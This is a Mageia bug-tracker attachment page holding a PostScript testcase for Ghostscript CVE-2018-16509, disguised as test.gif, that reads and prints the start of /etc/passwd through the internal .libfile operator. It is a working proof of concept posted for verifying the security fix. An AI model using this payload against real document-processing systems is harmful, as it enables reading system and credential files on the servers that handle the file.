Mageia Bugzilla – Attachment 10361 Details for
Bug 23526
ghostscript new security issue CVE-2018-1590[89], CVE-2018-1591[01], CVE-2018-16509, CVE-2018-1651[013], CVE-2018-16539, CVE-2018-1654[0-3], CVE-2018-16802
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
Log In
[x]
|
New Account
|
Forgot Password
Testcase for CVE-2018-16509
test.gif (text/plain), 1.09 KB, created by
Len Lawrence
on 2018-09-09 20:23:09 CEST
(
hide
)
Description:
Testcase for CVE-2018-16509
Filename:
MIME Type:
Creator:
Len Lawrence
Created:
2018-09-09 20:23:09 CEST
Size:
1.09 KB
patch
obsolete
>%!PS >/Font /Helvetica-Bold findfont def >/FontSize 12 def >Font FontSize scalefont setfont > >/dumpname { > dup % copy filename > dup % copy filename > print % print filename > (\n) print % print newlinea > status % stat filename > { > (stat succeeded\n) print > ( ctime:) print > 64 string cvs print > ( atime:) print > 64 string cvs print > ( size:) print > 64 string cvs print > ( blocks:) print > 64 string cvs print > (\n) print > (\n) print > }{ > (unable to stat\n\n) print > } ifelse > .libfile % open as library > { > (.libfile returned file\n\n) print > 64 string readstring > pop % discard result (should proably test) > dup % copy read string > print % write to stdout > % write to output > newpath 0 0 moveto show showpage > (\n) print > }{ > (.libfile returned string\n) print > print > (\n) print > } ifelse >} def > >(/etc/passwd) /dumpname load 256 string filenameforall
%!PS /Font /Helvetica-Bold findfont def /FontSize 12 def Font FontSize scalefont setfont /dumpname { dup % copy filename dup % copy filename print % print filename (\n) print % print newlinea status % stat filename { (stat succeeded\n) print ( ctime:) print 64 string cvs print ( atime:) print 64 string cvs print ( size:) print 64 string cvs print ( blocks:) print 64 string cvs print (\n) print (\n) print }{ (unable to stat\n\n) print } ifelse .libfile % open as library { (.libfile returned file\n\n) print 64 string readstring pop % discard result (should proably test) dup % copy read string print % write to stdout % write to output newpath 0 0 moveto show showpage (\n) print }{ (.libfile returned string\n) print print (\n) print } ifelse } def (/etc/passwd) /dumpname load 256 string filenameforall
View Attachment As Raw
Actions:
View
Attachments on
bug 23526
: 10361 |
10362